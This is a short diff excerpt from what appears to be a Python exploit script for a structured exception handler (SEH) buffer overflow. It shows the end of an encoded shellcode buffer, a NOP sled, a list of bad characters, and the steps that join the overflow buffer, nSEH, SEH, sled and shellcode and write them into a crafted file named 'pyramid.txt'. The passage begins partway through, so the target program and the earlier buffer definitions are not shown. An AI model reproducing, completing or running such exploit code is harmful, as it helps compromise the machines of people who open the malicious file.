+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+ 
+nops = "\x90" * 16
+ 
+badchars = "\x0a\x0d"
+ 
+data = buffer + nSEH + SEH + nops + buf
+ 
+f = open ("pyramid.txt", "w")
+f.write(data)
+f.close()